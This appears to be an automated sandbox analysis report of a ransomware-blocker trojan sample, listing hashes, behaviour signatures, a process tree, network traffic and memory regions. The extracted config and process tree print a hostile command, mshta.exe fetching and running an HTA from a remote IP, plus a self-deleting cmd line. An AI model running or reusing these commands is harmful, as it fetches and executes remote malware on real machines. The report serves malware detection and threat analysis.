Analysis

  • max time kernel
    36s
  • max time network
    69s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/11/2022, 10:24 UTC

Errors

Reason
Machine shutdown

General

  • Target

    Trojan-Ransom.Win32.Blocker.exe

  • Size

    1.0MB

  • MD5

    985ee7dc0de6c5081bf40ba08b93d37b

  • SHA1

    9386445adf364543c10c8f11cef54cfcd4fdd54f

  • SHA256

    4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

  • SHA512

    ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

  • SSDEEP

    24576:gljS8/Ns4q86Oh1Jp9cAnlwDUctAaxu19GroaJqlZJhUr:x8u4q8xXTeAnEUc6CuWroaJqFhUr

Malware Config

Extracted

Language
hta
Source
1
mshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq"
URLs
hta.dropper

http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 12 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • System policy modification 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe
    "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:940
    • C:\Users\Admin\AppData\Roaming\guard-kgch.exe
      C:\Users\Admin\AppData\Roaming\guard-kgch.exe
      2⤵
      • UAC bypass
      • Executes dropped EXE
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1748
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq"
        3⤵
          PID:980
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TROJAN~1.EXE" >> NUL
        2⤵
        • Deletes itself
        PID:1816
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x0
      1⤵
        PID:824
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x1
        1⤵
          PID:2000

        Network

        • flag-us
          DNS
          checkip.dyndns.org
          guard-kgch.exe
          Remote address:
          8.8.8.8:53
          Request
          checkip.dyndns.org
          IN A
          Response
          checkip.dyndns.org
          IN CNAME
          checkip.dyndns.com
          checkip.dyndns.com
          IN A
          132.226.247.73
          checkip.dyndns.com
          IN A
          132.226.8.169
          checkip.dyndns.com
          IN A
          193.122.6.168
          checkip.dyndns.com
          IN A
          158.101.44.242
          checkip.dyndns.com
          IN A
          193.122.130.0
        • flag-br
          GET
          http://checkip.dyndns.org/
          guard-kgch.exe
          Remote address:
          132.226.247.73:80
          Request
          GET / HTTP/1.1
          User-Agent: Mozilla/4.0
          Host: checkip.dyndns.org
          Response
          HTTP/1.1 200 OK
          Date: Mon, 07 Nov 2022 10:25:46 GMT
          Content-Type: text/html
          Content-Length: 104
          Connection: keep-alive
          Cache-Control: no-cache
          Pragma: no-cache
        • 93.184.220.29:80
          46 B
          40 B
          1
          1
        • 204.79.197.200:443
          40 B
          1
        • 132.226.247.73:80
          http://checkip.dyndns.org/
          http
          guard-kgch.exe
          299 B
          405 B
          5
          3

          HTTP Request

          GET http://checkip.dyndns.org/

          HTTP Response

          200
        • 8.8.8.8:53
          checkip.dyndns.org
          dns
          guard-kgch.exe
          64 B
          176 B
          1
          1

          DNS Request

          checkip.dyndns.org

          DNS Response

          132.226.247.73
          132.226.8.169
          193.122.6.168
          158.101.44.242
          193.122.130.0

        MITRE ATT&CK Enterprise v6

        Downloads

        • C:\Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • \Users\Admin\AppData\Roaming\guard-kgch.exe

          Filesize

          1.0MB

          MD5

          985ee7dc0de6c5081bf40ba08b93d37b

          SHA1

          9386445adf364543c10c8f11cef54cfcd4fdd54f

          SHA256

          4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c

          SHA512

          ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee

        • memory/824-72-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

          Filesize

          8KB

        • memory/940-66-0x00000000002E0000-0x000000000033F000-memory.dmp

          Filesize

          380KB

        • memory/940-57-0x0000000003230000-0x0000000003234000-memory.dmp

          Filesize

          16KB

        • memory/940-55-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/940-65-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/940-54-0x0000000075521000-0x0000000075523000-memory.dmp

          Filesize

          8KB

        • memory/940-56-0x00000000002E0000-0x000000000033F000-memory.dmp

          Filesize

          380KB

        • memory/1748-67-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-68-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB

        • memory/1748-70-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-71-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB

        • memory/1748-73-0x0000000000400000-0x000000000058A000-memory.dmp

          Filesize

          1.5MB

        • memory/1748-74-0x0000000001DD0000-0x0000000001E2F000-memory.dmp

          Filesize

          380KB
